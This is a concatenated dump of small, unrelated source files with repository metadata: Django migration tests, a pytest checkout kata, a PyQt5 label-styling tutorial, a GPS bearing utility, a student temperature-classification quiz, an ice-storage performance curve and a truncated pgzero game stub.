batch_size=args.batch_size,
shuffle = False)
return train_loader, test_loader
| UTF-8 | Python | false | false | 2,995 | py | 15 | transforms.py | 11 | 0.558264 | 0.535893 | 0 | 52 | 56.596154 | 114 |
victorskl/panelapp | 17,643,725,664,771 | 273ff28b8464704d8b37e53dd97a87dd2f51d0d7 | 01df468685c9f393b9559cb68df349ef7abcf5a6 | /panelapp/accounts/tests/test_permissions.py | b6143147770483d8de8b2301c92f3bbdb893eb3b | [
"Apache-2.0"
] | permissive | https://github.com/victorskl/panelapp | 481af901472cd960da2d0abf17239b8d484524be | 4dfdd31f6036db5cb4e692961ef9bcbe92d39a23 | refs/heads/master | 2020-05-07T16:28:08.946472 | 2019-01-23T11:04:41 | 2019-01-23T11:04:41 | 180,684,104 | 1 | 0 | null | true | 2019-04-11T00:28:26 | 2019-04-11T00:28:26 | 2019-04-03T14:24:17 | 2019-04-10T12:20:03 | 4,147 | 0 | 0 | 0 | null | false | false | from django.contrib.auth.models import Group
from accounts.tests.setup import TestMigrations
class PermissionsTest(TestMigrations):
migrate_from = '0005_auto_20170816_0954'
migrate_to = '0006_auto_20180612_0937'
app = 'accounts'
def test_groups(self):
self.assertEqual(Group.objects.filter(name='Site Editor').count(), 1)
self.assertEqual(Group.objects.filter(name='User Support').count(), 1)
self.assertEqual(Group.objects.filter(name='File Upload Curation').count(), 1)
| UTF-8 | Python | false | false | 515 | py | 128 | test_permissions.py | 123 | 0.718447 | 0.650485 | 0 | 13 | 38.615385 | 86 |
DPNT-Sourcecode/CHK-tixr01 | 14,705,968,059,264 | 0af4759b2ab7b7bace259c0c365a0f18316e8b64 | f7ee15e1381e7157acd2d01abd5d6c99fab7f565 | /test/solutions/test_checkout_1.py | 70d424bc4e095f6df910aa5d475d00acb2227256 | [
"Apache-2.0"
] | permissive | https://github.com/DPNT-Sourcecode/CHK-tixr01 | 19f7adbd1d584ae9c12546af78a133aaae80bd98 | 82595223b2be38156b87d3c52a1236f07c756f59 | refs/heads/master | 2021-04-03T09:24:54.110120 | 2018-03-10T18:30:29 | 2018-03-10T18:30:53 | 124,686,799 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from lib.solutions.checkout import checkout
import pytest
@pytest.mark.parametrize('test_string, expected_price', [
('EE', 80),
('EEEEBB', 160),
('BEBEEE', 160),
('EE', 80)
])
def test_checkout(test_string, expected_price):
assert checkout(test_string) == expected_price
| UTF-8 | Python | false | false | 278 | py | 3 | test_checkout_1.py | 3 | 0.701439 | 0.665468 | 0 | 12 | 22.166667 | 57 |
anyuhanfei/study_PyQt5 | 10,539,849,761,002 | 5bfe818633912b91cb057908d72c1e625e419e85 | 46bff46d767e16e4b78221db2d040b3346b83c18 | /016~032-QObject/025~026-QObject-类型判定/026-QObject-类型判定-案例.py | 0e143835b730077c0f5228e28f0c7c7e8113ff9d | [] | no_license | https://github.com/anyuhanfei/study_PyQt5 | ef5a537795ff979838481ac2253dfe65b32a7796 | ed9f0595abfde3b0b3ba0f5dce2acd9dc9d2ef1d | refs/heads/master | 2020-12-09T04:24:21.821808 | 2020-06-08T09:52:57 | 2020-06-08T09:52:57 | 233,191,765 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
026-QObject-类型判定-案例
创建一个窗口, 包含多个QLabel或其他控件, 将包含在窗口内所有的QLabel控件, 设置背景色cyan
'''
import sys
from PyQt5.QtWidgets import QWidget, QLabel, QApplication, QPushButton
class Window(QWidget):
def __init__(self):
super().__init__()
self.setWindowTitle('026_QObject_类型判定_案例')
self.resize(500, 500)
self.index()
def index(self):
label1 = QLabel(self)
label1.setText('label 1')
label1.move(10, 10)
label2 = QLabel(self)
label2.setText('label 2')
label2.move(10, 40)
btn1 = QPushButton(self)
btn1.setText('button 1')
btn1.move(10, 70)
# self.findChildren(QLabel) 此方法返回 self 对象中的所有 Qlabel 控件(也是一种方法,但因与本章无关,所以不用)
# 获取所有控件,并判断控件的父类是否是 QLabel 来判定此控件是否是 QLabel 控件
for widget in self.children():
if widget.inherits('QLabel') is True:
widget.setStyleSheet("background-color: cyan;")
if __name__ == '__main__':
app = QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
| UTF-8 | Python | false | false | 1,281 | py | 274 | 026-QObject-类型判定-案例.py | 271 | 0.605042 | 0.570495 | 0 | 45 | 22.8 | 84 |
Sourabhchrs93/star-wars-api | 12,326,556,183,343 | ea7e008016b2f80a36a1bcfd33df3998d9809751 | a82ae3ca1b7da64e5e0ea224fbf8b89a5f0d4154 | /src/services/db_services.py | 537cda6cb55b753dd0b0fd26f1483d7a50f4dade | [] | no_license | https://github.com/Sourabhchrs93/star-wars-api | ec38a2ecf73bbe6c1e40093adc6063961d335c58 | acd4754643a38f495ae3efab00141a830d33e3d6 | refs/heads/master | 2020-05-23T01:09:41.270738 | 2019-05-15T10:43:37 | 2019-05-15T10:43:37 | 186,583,455 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import csv
class LocalDatabase:
def __init__(self, file_path):
self.file_path = file_path
def is_exist(self, data_str):
data_str = "{0}\n".format(data_str)
with open(self.file_path, 'r') as f:
file_data = f.readlines()
if data_str in file_data:
return True
else:
return False
def write(self,data_str):
if not self.is_exist(data_str):
with open(self.file_path, 'a') as f:
f.write('{0}\n'.format(data_str))
return True
else:
return False
def read(self, fav_type):
out_data = []
with open(self.file_path, 'rt')as f:
data = csv.reader(f)
for row in data:
if fav_type == row[0]:
out_data.append({'name': row[1], 'url': row[2]})
elif fav_type == "all":
out_data.append({'name': row[1], 'url': row[2]})
return out_data, len(out_data)
def clean(self):
try:
with open(self.file_path, 'w') as f:
f.truncate(0)
return True
except Exception as e:
return False
| UTF-8 | Python | false | false | 1,208 | py | 11 | db_services.py | 10 | 0.477649 | 0.471026 | 0 | 44 | 26.454545 | 68 |
elementc/monica-tests-yeagerized | 15,144,054,728,995 | f3ad294ff7176d3a71cc417c0a49933d5b1119bf | 4aae1d0f3e4f862f452e39cd19cf5fa16dfb932b | /pages/dashboard.py | 29f3919bf648465ca5f168ec8130621722aa83f1 | [] | no_license | https://github.com/elementc/monica-tests-yeagerized | 4c3c43fd837dd515ba642eddfc8ec14a313a3f7c | b7528ffc2d3466a9fffc29b064513fefe4373bd3 | refs/heads/master | 2021-01-22T23:58:47.225864 | 2017-11-29T08:11:18 | 2017-11-29T08:11:18 | 102,428,998 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from .header_page import HeaderPage
from selenium.webdriver.common.by import By
class DashboardPage(HeaderPage):
dashboard_selector = (By.CSS_SELECTOR, "div.dashboard")
def initial_status(self):
# make sure there is a dashboard div visible...
self.driver.find_element(*self.dashboard_selector)
HeaderPage.initial_status(self)
| UTF-8 | Python | false | false | 360 | py | 24 | dashboard.py | 24 | 0.725 | 0.725 | 0 | 10 | 35 | 59 |
SEA-group/wowp_scripts | 9,689,446,254,646 | 94f82dc83caf03914aa9c59eaea5782541a1dc3f | 3b504a983f1807ae7c5af51078bfab8c187fc82d | /client/gui/HUD2/features/control/__init__.py | 0f90dffc160b5b7c5dd4a1c6a0aa7c22a7a7b672 | [] | no_license | https://github.com/SEA-group/wowp_scripts | 7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58 | 2fe54a44df34f2dcaa6860a23b835dcd8dd21402 | refs/heads/master | 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Embedded file name: scripts/client/gui/HUD2/features/control/__init__.py
pass | UTF-8 | Python | false | false | 79 | py | 1,504 | __init__.py | 1,016 | 0.772152 | 0.759494 | 0 | 2 | 39 | 74 |
geekandglitter/SiteEvents | 18,614,388,275,606 | 95454914285417a245f4865305bd5af0b632a1fb | 00dd39d7d4975fec18987649fa4c86ad3434d7b6 | /SiteEventsAPP/context_processors.py | 89ce2105d8834a27832896f403445880ed2afa93 | [] | no_license | https://github.com/geekandglitter/SiteEvents | 44a68645cc82711a5ba27de89ac1560882e39d6e | 6bb01b30ca4b9103d28ff8d931ff58b61d431643 | refs/heads/master | 2020-05-04T23:06:43.631667 | 2019-07-10T19:58:01 | 2019-07-10T19:58:01 | 179,533,268 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Context processor allows the base html to have a view associated with it. We need it for the navbar dropdown.
def companies(request):
from os import listdir # listdir searches through a given path
dirlist = listdir('static/csv/')
return {'comps': dirlist}
| UTF-8 | Python | false | false | 273 | py | 28 | context_processors.py | 14 | 0.728938 | 0.728938 | 0 | 7 | 38 | 111 |
rbelew/OakCrime | 12,378,095,787,796 | 41a8b6ff01489e1edda511a804bc830b534d0a36 | cbe32e9c7e790d72789e9d5d3ad7924fc1aa0811 | /showCrime/dailyIncid/management/commands/parse_UCR.py | 46bc77a0f0c401a59415babefebc60f1ae7c9855 | [] | no_license | https://github.com/rbelew/OakCrime | 91eb2ce3b98ad2f2822c9a72cdb894b1fec7b129 | ac6194c7c6930ab5b9552bb2e0f169fa01c71dd7 | refs/heads/master | 2021-01-09T20:51:09.495083 | 2020-08-01T21:56:29 | 2020-08-01T21:56:29 | 10,574,718 | 14 | 14 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf8
''' parse_UCR_pdfquery
parse OPD weekly UCR reports
leans heavily on pdfplumber, esp. its TABLE extraction
https://github.com/jsvine/pdfplumber says:
Works best on machine-generated, rather than scanned, PDFs. Built on pdfminer and pdfminer.six.
Created on Nov 3, 2017
update 12 Feb 19
@author: rik
'''
from collections import defaultdict
import pickle # cPickle for python2
from datetime import datetime
import glob
import json
import os
import re
import sys
import pdfplumber
OPD_UCR_DateFormat = '%Y-%b-%d'
IgnoredLabels = ['Part 1 Crimes','THIS REPORT IS HIERARCHY BASED.',
'(homicide, aggravated assault, rape, robbery)' ]
LabelUCROrder = [u'Violent Crime Index',
u'Homicide – 187(a)PC',
u'Homicide – All Other *',
u'Aggravated Assault',
# 190212: new labeles
# u'Shooting with injury – 245(a)(2)PC',
u'Assault with a firearm – 245(a)(2)PC',
# u'Subtotal - Homicides + Injury Shootings',
u'Subtotal - Homicides + Firearm Assault',
u'Shooting occupied home or vehicle – 246PC',
u'Shooting unoccupied home or vehicle – 247PC',
u'Non-firearm aggravated assaults',
u'Rape',
u'Robbery',
u'Firearm',
u'Knife',
u'Strong-arm',
u'Other dangerous weapon',
# u'Residential robbery – 212.5(A)PC',
u'Residential robbery – 212.5(a)PC',
# u'Carjacking – 215(A) PC',
u'Carjacking – 215(a) PC',
u'Burglary',
u'Auto',
u'Residential',
u'Commercial',
u'Other (Includes boats, aircraft, and so on)',
u'Unknown',
u'Motor Vehicle Theft',
u'Larceny',
u'Arson',
u'Total' ]
IgnoreStatLbl = ['Author', 'CreateDate', 'ModDate', 'fname', 'fromDate', 'rptDate', 'toDate']
FixFilePat = {re.compile(r'Area(\d)WeeklyCrimeReport11Jun17Jun18.pdf'): '180619_Area %d Weekly Crime Report 11Jun - 17Jun18.pdf'}
def dateConvert(o):
if isinstance(o, datetime):
return o.strftime('%y%m%d')
def parse_UCR_pdf(inf,rptDate,fdate,tdate,verbose=False):
try:
pdf = pdfplumber.open(inf)
docinfo = pdf.metadata
pdf1 = pdf.pages[0]
allTbl = pdf1.extract_tables()
except Exception as e:
print('parse_UCR_pdf: cant load',inf,e)
return None
# .extract_table returns a list of lists, with each inner list representing a row in the table.
tbl = allTbl[0]
if verbose:
print('parse_UCR_pdf: Table found %d x %d' % (len(tbl),len(tbl[0]) ))
statTbl = {}
for i in range(len(tbl)):
lbl = tbl[i][0]
ignore = False
for ignoreLine in IgnoredLabels:
if lbl == None or lbl.startswith(ignoreLine):
ignore = True
break
if ignore:
continue
vals = tbl[i][1]
vals = vals.replace(' ','') # multi-digit numbers have intermediate spaces
if vals=='-':
val = 0
else:
try:
val = int(vals)
except Exception as e:
print(i,lbl,vals,e)
continue
if verbose:
print(i,lbl,val)
statTbl[lbl] = val
statTbl['Author'] = docinfo['Author']
statTbl['CreateDate'] = docinfo['CreationDate']
statTbl['ModDate'] = docinfo['ModDate']
statTbl['fname'] = fname
statTbl['rptDate'] = rptDate
statTbl['fromDate'] = fdate
statTbl['toDate'] = tdate
if verbose:
print('parse_UCR_pdf: NKey=%d %s' %(len(statTbl.keys()),inf))
return statTbl
def combineWeeksUCR(allStats):
allKeys = list(allStats.keys())
allKeys.sort()
# allLblTbl: lbl -> date -> div -> freq
allLblTbl = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
for k in allKeys:
divs,rptDate = k.split('_')
div = int(divs)
# NB: need to distinguish stat's lbl which may have \n from mlbl used in LabelUCROrder
for slbl in allStats[k]:
if slbl.find('\n') != -1:
mlbl = slbl.split('\n')[0]
else:
mlbl = slbl
if mlbl in LabelUCROrder:
allLblTbl[mlbl][rptDate][div] = allStats[k][slbl]
elif mlbl not in IgnoreStatLbl:
print("combineWeeksUCR: unknown label?! %s %s" % (mlbl,k))
return allLblTbl
def rptAllStats(allLblTbl,outf):
"""produce CSV file of UCR crime categories X dates, breaking out indiv divisions' subtotals
"""
allDatesSet = set()
for lbl in allLblTbl.keys():
allDatesSet.update(allLblTbl[lbl].keys())
allDates = list(allDatesSet)
allDates.sort()
# ASSUME five OPD division
OPDivs = range(1,6)
outs = open(outf,'w')
line = '"UCRCategory \ Date"'
for dates in allDates:
dateDup = 6 * (','+dates)
line += ('%s' % (dateDup))
outs.write(line+'\n')
line = 'Division'
for dates in allDates:
for div in OPDivs:
line += (',%d' % (div))
line += (',tot')
outs.write(line+'\n')
for lbl in LabelUCROrder:
albl = lbl.encode(encoding='utf_8', errors='strict').decode('ascii','ignore')
line = '"%s"' % (albl)
for dates in allDates:
tot = 0
for div in OPDivs:
if dates in allLblTbl[lbl] and div in allLblTbl[lbl][dates]:
val = int(allLblTbl[lbl][dates][div])
else:
val = 0
line += (',%d' % (val))
tot += val
line += (',%d' % (tot))
line += '\n'
outs.write(line)
outs.close()
def rptSummStats(allLblTbl,outf):
"""produce CSV file of UCR crime categories X dates, summing divisions' subtotals
also echo crime categories across all data
"""
allDatesSet = set()
for lbl in allLblTbl.keys():
allDatesSet.update(allLblTbl[lbl].keys())
allDates = list(allDatesSet)
allDates.sort()
lblTots = defaultdict(int)
# ASSUME five OPD division
OPDivs = range(1,6)
outs = open(outf,'w')
line = '"UCRCategory \ Date"'
for dates in allDates:
line += (',%s' % (dates))
outs.write(line+'\n')
for lbl in LabelUCROrder:
albl = lbl.encode(encoding='utf_8', errors='strict').decode('ascii','ignore')
line = '"%s"' % (albl)
for dates in allDates:
tot = 0
for div in OPDivs:
if dates in allLblTbl[lbl] and div in allLblTbl[lbl][dates]:
tot += int(allLblTbl[lbl][dates][div])
lblTots[lbl] += tot
line += (',%s' % (tot))
line += '\n'
outs.write(line)
outs.close()
for lbl in LabelUCROrder:
if lblTots[lbl] == 0:
print('%s\t%d <=======' % (lbl,lblTots[lbl]))
else:
print('%s\t%d' % (lbl,lblTots[lbl]))
# Police Area 3 Weekly Crime Reports
DivDirName_pat = re.compile(r'Police Area (\d) Weekly Crime Reports')
# fname = '190114_Area 2 Weekly Crime Report 07Jan - 13Jan19.pdf'
FileName_pat = re.compile(r'(\d+)_Area (\d) Weekly Crime Report (\d+)(\D+) - (\d+)(\D+)(\d+).pdf')
def fname2dates(fname):
# 190212
# fname = '190114_Area 2 Weekly Crime Report 07Jan - 13Jan19.pdf'
match = FileName_pat.match(fname)
if match:
# match.groups() = ('190114', '2', '07', 'Jan', '13', 'Jan', '19')
(postDateStr,areaNum,fday,fmon,tday,tmon,yr) = match.groups()
else:
print('fname2dates: cant parse',fname)
# import pdb; pdb.set_trace()
return None,None,None
# HACK: common exceptions (:
if tmon == 'Sept':
tmon = 'Sep'
if yr.startswith('20'):
yr = yr[2:]
rptDate = datetime.strptime(postDateStr,'%y%m%d')
try:
fdate = datetime.strptime('%s%s%s' % (fday,fmon,yr),'%d%b%y')
tdate = datetime.strptime('%s%s%s' % (tday,tmon,yr),'%d%b%y')
except:
print('fname2dates: bad dates?', fname)
# import pdb; pdb.set_trace()
fdate = tdate = None
return rptDate,fdate,tdate
if __name__ == '__main__':
dataDir = '/Data/c4a-Data/OAK_data/OPD-UCR/190212-harvest/'
begTime = datetime.now()
dateStr = begTime.strftime('%y%m%d')
jsonFile = dataDir + 'UCR_WeeklyStats_%s.json' % (dateStr)
statsOnly = False
if statsOnly:
print('parse_UCR: loading data from JSON file',jsonFile)
allStats = json.load(open(jsonFile))
print('parse_UCR: NStatFiles = %d' % (len(allStats)))
else:
rptFreq = 10
checkPointFreq = 50
divDirList = glob.glob(dataDir+'Police Area *')
allPDFiles = []
for divDirPath in divDirList:
if not os.path.isdir(divDirPath):
continue
ddpath,divDir = os.path.split(divDirPath)
match = DivDirName_pat.match(divDir)
if match:
# match.groups() = ('2')
divNumStr = match.groups()
divNum = int(divNumStr[0])
else:
print('parse_UCR: cant parse divDir',divDir)
continue
print('parse_UCR: NFiles=%d searching files for Div=%d : %s' % (len(allPDFiles),divNum,divDir ))
for divSubDir in glob.glob(divDirPath+'/*'):
# NB: pdfs are posted at top-level within division?!
if os.path.isfile(divSubDir):
if divSubDir.endswith('.pdf'):
allPDFiles.append( (divNum,divSubDir) )
else:
print('parse_UCR: skipping non-PDF file',divSubDir)
continue
if os.path.isdir(divSubDir):
for f in glob.glob(divSubDir+'/*.pdf'):
allPDFiles.append( (divNum,f) )
print('parse_UCR: NFiles found=%d' % (len(allPDFiles)))
nbad = 0
allStats = {}
for i,info in enumerate(allPDFiles):
# NB: checkpoint saved at top of loop,
if i > 0 and (i % checkPointFreq == 0):
cpjson = dataDir + 'UCR_WeeklyStats_%s_cp-%d.json' % (dateStr,i)
json.dump(allStats,open(cpjson,'w'),indent=1,default=dateConvert)
divNum,pdff = info
dirname,fname = os.path.split(pdff)
for fixPat in FixFilePat.keys():
match = fixPat.match(fname)
if match:
# match.groups() = ('2')
divNumStr = match.groups()
divNum = int(divNumStr[0])
newfname = FixFilePat[fixPat] % divNum
print('parse_UCR: fixing bad fname: %s <- %s' % (newfname,fname))
fname = newfname
# fname = '190114_Area 2 Weekly Crime Report 07Jan - 13Jan19.pdf'
rptDate,fdate,tdate = fname2dates(fname)
try:
statTbl = parse_UCR_pdf(pdff,rptDate,fdate,tdate)
except Exception as e:
print('parse_UCR: cant process %d %s %s' % (i,fname,e))
nbad += 1
continue
if statTbl==None:
print('parse_UCR: cant process (None) %d %s' % (i,fname))
nbad += 1
continue
if rptDate == None:
rptDateStr = 'missDate-%d' % (i)
else:
rptDateStr = rptDate.strftime('%y%m%d')
k = '%d_%s' % (divNum,rptDateStr)
if k in allStats:
print('parse_UCR_Pdf: duplicate keys?! %s\n\t%s\n\t%s' % \
(k,statTbl,allStats[k]))
continue
allStats[k] = statTbl
# NB: reporting at end of loop,
if i > 0 and (i % rptFreq == 0):
elapTime = datetime.now() - begTime
print('%d %s done (%s sec)' % (i,k,elapTime.total_seconds()))
print('parse_UCR: NStatFiles = %d' % (len(allStats)))
json.dump(allStats,open(jsonFile,'w'),indent=1,default=dateConvert)
allLblTbl = combineWeeksUCR(allStats)
statFile = dataDir + 'UCR_WeeklyStats_%s.csv' % (dateStr)
rptAllStats(allLblTbl, statFile)
statFile = dataDir + 'UCR_WeeklySummStats_%s.csv' % (dateStr)
rptSummStats(allLblTbl, statFile)
| UTF-8 | Python | false | false | 10,597 | py | 76 | parse_UCR.py | 34 | 0.638366 | 0.621537 | 0 | 394 | 25.832487 | 129 |
MarkusH/django-migrations-benchmark | 489,626,306,798 | cf0331a469d22fe17b3a425481dbc39c7ede1a9e | 10fbe5526e5f0b8588b65f70f088cd86b6e9afbe | /wyxbcga/migrations/0005_xqjugixefj_bbwlhkxvqd.py | d4af67b61f7d87e0c026ca0cf67c49075fed16b8 | [] | no_license | https://github.com/MarkusH/django-migrations-benchmark | eb4b2312bb30a5a5d2abf25e95eca8f714162056 | e2bd24755389668b34b87d254ec8ac63725dc56e | refs/heads/master | 2016-09-05T15:36:45.250134 | 2015-03-31T23:44:28 | 2015-03-31T23:44:28 | 31,168,231 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ysgxuyu', '0005_auto_20150218_1622'),
('wyxbcga', '0004_remove_xqjugixefj_xvbpvsvwrw'),
]
operations = [
migrations.AddField(
model_name='xqjugixefj',
name='bbwlhkxvqd',
field=models.OneToOneField(null=True, related_name='+', to='ysgxuyu.Bmovnbnmed'),
),
]
| UTF-8 | Python | false | false | 509 | py | 540 | 0005_xqjugixefj_bbwlhkxvqd.py | 540 | 0.603143 | 0.561886 | 0 | 20 | 24.45 | 93 |
petemarshall77/RoboMagellan-2016 | 10,213,432,243,445 | efabceb49fa2410a4095190b34d4da95c0a91cec | ad567674f2731deda506b0c2c98dfc2aba3a5d1d | /utils.py | 84e72990c449094d658c035e5f2c3c1996defa14 | [] | no_license | https://github.com/petemarshall77/RoboMagellan-2016 | 0f657fcc22cabcef74d5f9e5a2fb144d6d2c6557 | 2edc3d3632204d4a194c8792f6366baf35d028ed | refs/heads/master | 2021-01-10T18:44:37.913033 | 2016-03-30T02:01:03 | 2016-03-30T02:01:03 | 37,494,879 | 1 | 0 | null | false | 2015-12-20T20:38:38 | 2015-06-15T22:31:52 | 2015-12-17T20:13:27 | 2015-12-20T20:38:38 | 45 | 0 | 0 | 0 | Python | null | null | import math
class Utils:
@staticmethod
def get_distance_and_bearing(from_lat, from_long, to_lat, to_long):
from_lat = Utils.degrees_to_radians(from_lat)
from_long = Utils.degrees_to_radians(from_long)
to_lat = Utils.degrees_to_radians(to_lat)
to_long =Utils.degrees_to_radians(to_long)
delta_lat = to_lat - from_lat
delta_long = to_long - from_long
a = math.sin(delta_lat/2) * math.sin(delta_lat/2) + math.cos(from_lat) * \
math.cos(to_lat) * math.sin(delta_long/2) * math.sin(delta_long/2)
c = 2 * (math.atan2(math.sqrt(a), math.sqrt(1 - a)))
distance = 6371000 * c
y = math.sin(from_long - to_long) * math.cos(to_lat)
x = math.cos(from_lat) * math.sin(to_lat) - math.sin(from_lat) * \
math.cos(to_lat) * math.cos(from_long - to_long)
bearing = (Utils.radians_to_degrees(math.atan2(y,x)) + 360) % 360
return (distance, bearing)
@staticmethod
def degrees_to_radians(angle):
return angle * math.pi / 180.0
@staticmethod
def radians_to_degrees(radians):
return radians * 180 / math.pi
| UTF-8 | Python | false | false | 1,154 | py | 22 | utils.py | 21 | 0.598787 | 0.574523 | 0 | 32 | 35.0625 | 82 |
WangYi-star/MyPythonCode | 17,978,733,114,688 | 20c0fa6644c31416635c28bccacb2c0c07b4c9f2 | 79b06a6091865a1802c39b7c6bc8ef51eecc23ae | /homework2/question2.py | a5327b6425b883607d595dee55a53fc78ea6466b | [] | no_license | https://github.com/WangYi-star/MyPythonCode | 416543148b13328276a2f9461aedd522ee9423ac | 61dd8e781fa595aa7e8456438d69d4de9275cdbc | refs/heads/master | 2021-07-20T00:30:19.890224 | 2020-06-25T07:06:09 | 2020-06-25T07:06:09 | 244,940,357 | 0 | 0 | null | false | 2021-03-20T04:25:44 | 2020-03-04T15:49:48 | 2020-06-25T07:06:35 | 2021-03-20T04:25:42 | 3,674 | 0 | 0 | 1 | Python | false | false | # -*- encoding: utf-8 -*-
'''
@File : question2.py
@Time : 2020/03/08 20:25:58
@Author : xdbcb8
@Version : 1.0
@Contact : xdbcb8@qq.com
@WebSite : www.xdbcb8.com
'''
# here put the import lib
'''
编写一个函数,接收n个数字,求这些参数数字的和;
'''
def getsum():
sum=0;
n=int(input("请输入数字个数:"))
print("请输入数字:")
for i in range(0,n):
sum=sum+int(input())
print("数字求和:")
print(sum)
getsum()
| UTF-8 | Python | false | false | 478 | py | 99 | question2.py | 92 | 0.582915 | 0.525126 | 0 | 23 | 16.304348 | 28 |
crisfelip/programacion1 | 17,343,077,948,171 | eded8790846e0c91af45c62b2394893b87bd28c0 | 07290ade70dc658eda30150e2eaf9c60d490cd1f | /clases/examenes/quiz2.py | 53ea4da908c7ff1a7fc5500976b32fcf02378fa2 | [] | no_license | https://github.com/crisfelip/programacion1 | 5d1aea0a3f9ac733c5663c25d6b9263f6ea44a01 | 5fb1a81ba6ac34e875a4bc4fe54ccde34b0d7bf7 | refs/heads/main | 2023-05-26T23:28:24.992906 | 2021-05-27T13:08:14 | 2021-05-27T13:08:14 | 335,283,296 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | Temperatura_Corporal = [36,37,38,35,36,38,37.5,38.2,41,37.4,38.6,39.1,40.3,33]
preguntamenu = '''buen dia espero te encuentres bien
1- conversion de temperatura
2- clasificacion de temperatura
3- temperatura max y min
4- salir
escoga una opcion para continuar '''
preguntaconversion = '''
c- temperatura en celsius
k- temperatura en kelvin
f- temperatura en fahrenheit
ingrese la letra dependiendo en que unidades quiera el resultado : '''
mensajecelsius= 'los datos estan en celsius por lo que no se requiere una conversion '
mensajeeleccion = 'elegiste la opcion {}'
mensajeerrormen = 'error, utilice una opcion permitida'
mensajesalida = 'feliz dia cualquiera que este sea'
#codigoooooo
opcion = int(input(preguntamenu))
#conversiones
listafahrenheit =[]
listakelin = []
for elemento in Temperatura_Corporal:
fahrenheit = round (elemento*1.8)+ 32
listafahrenheit.append (fahrenheit)
for elemento in Temperatura_Corporal:
kelvin = round (elemento + 273.15)
listakelin.append(kelvin)
#clasificaciones
listaclasificacion = []
for elemento in Temperatura_Corporal:
clasificacion = ""
if (elemento < 36):
clasificacion = 'hipotermia'
elif (elemento >= 36 and elemento <=37.5):
clasificacion= 'temperatura normal'
elif (elemento >=37.6):
clasificacion= 'fiebre'
else:
clasificacion= 'datos errados'
listaclasificacion.append (clasificacion)
# temperatura max y min
maxima = max(Temperatura_Corporal)
minima = min(Temperatura_Corporal)
# menu
while (opcion !=4):
if (opcion == 1):
print(mensajeeleccion.format(1))
conversion = input(preguntaconversion)
if(conversion == 'c'):
print (mensajecelsius)
print (Temperatura_Corporal)
elif(conversion == 'f'):
print (listafahrenheit)
elif (conversion == 'k'):
print (listakelin)
else: (mensajeerrormen)
elif (opcion == 2):
print (mensajeeleccion.format(2))
(listaclasificacion)
elif (opcion == 3):
print (mensajeeleccion.format(3))
print ('la temperatura maxima es', maxima)
print ('la temperatura minima es', minima)
else:
print (mensajeerrormen)
opcion = int (input (preguntamenu))
print (mensajesalida) | UTF-8 | Python | false | false | 2,336 | py | 29 | quiz2.py | 28 | 0.667808 | 0.640411 | 0 | 81 | 27.851852 | 86 |
x92499/CTES | 13,056,700,604,629 | bfcbfd29eab3d804308534b133aefa26e12f1dc2 | 18994bb4bac9d7e62d19479e234c44f0b9e1197c | /add_ice_storage_to_plant_loop_for_load_flexiblity/analysis/performance.py | 87296c85b76b7cdd7c74e67fc9241dacc681361d | [
"BSD-2-Clause"
] | permissive | https://github.com/x92499/CTES | 935a92395153df97915afa281a44f024d5c2796b | ac068a320ad5aa216d675d7f6239fdc8f879859b | refs/heads/master | 2020-12-29T23:26:11.468852 | 2020-06-22T16:08:44 | 2020-06-22T16:08:44 | 209,821,176 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Ice Performance Curve Function
# Karl Heine, 9/2019
# This function calculates the maximum ice discharge rate
# Ref. E+ Engineering Reference, section 15.1.2, (p. 791 in v. 9.1.0)
def ice_performance (soc, return_temp, supply_temp, ice_cap, flag):
# Import req'd packages
import numpy as np
# Ice Storage Curve Parameters
c = [0, 0.09, -0.15, 0.612, -0.324, -0.216] # Same Coefficients for both charge and discharge in OS default
x_rng = [0, 1] # Range on SOC Variable Inputs
y_rng = [0, 9.9] # Range on DTlm* Variable Inputs
freeze_temp = 0 # Freezing temperature of the ice storage [C]
DTlm_nom = 10 # Nominal delta T, must equal 10C based on E+ Engineering Reference Guide
# Set Charge or Discharge values based on flag
if flag == 0: # Discharging
x = (1 - soc)
elif flag == 1: # Charging - Incomplete!
x = soc
if (return_temp - freeze_temp) / (supply_temp - freeze_temp) >= 0:
DTlm = (return_temp - supply_temp) / np.log((return_temp - freeze_temp) / (supply_temp - freeze_temp))
else:
DTlm = 0
y = DTlm / DTlm_nom # Non-dimensionalized DTlm value
# Check limits on input variable values
# x is either percent charged or percent discharged
if x < x_rng[0]:
x = x_rng[0]
elif x > x_rng[1]:
x = x_rng[1]
# y is non-dimensionalized log mean temperature difference across ice heat exchanger
if y < y_rng[0]:
y = y_rng[0]
elif y > y_rng[1]:
y = y_rng[1]
# Max rate of discharge from ice - neglect charging for now.
q_star = (c[0] + (c[1] * x) + (c[2] * (x**2))) + ((c[3] + (c[4] * x) + (c[5] * (x**2))) * y)
q = q_star * ice_cap / 1 # Divisor is timestep of performance curve [hr], assumed to be 1 hr.
return q;
| UTF-8 | Python | false | false | 1,849 | py | 9 | performance.py | 6 | 0.587345 | 0.551109 | 0 | 49 | 36.734694 | 119 |
kacpert20/project-jumper | 2,576,980,383,241 | 570b901b50708ba3d10805835af0312e902027b4 | 12493b1fbcf498e9267a7037e2f96991089e2a86 | /project-jumper-00.py | 2599e7ce840d69da7d2335c7af5e21c4140f6ddf | [
"MIT"
] | permissive | https://github.com/kacpert20/project-jumper | 515fe704583fbb35202ca12ca431763e16d8b7ae | a66a42c18cf952337720d0104d777f9307c5aac4 | refs/heads/main | 2023-03-01T12:14:43.813537 | 2021-02-12T10:54:05 | 2021-02-12T10:54:05 | 338,280,075 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # to jest komentarz
import pgzrun
WIDTH = 474
HEIGHT = 842
def draw():
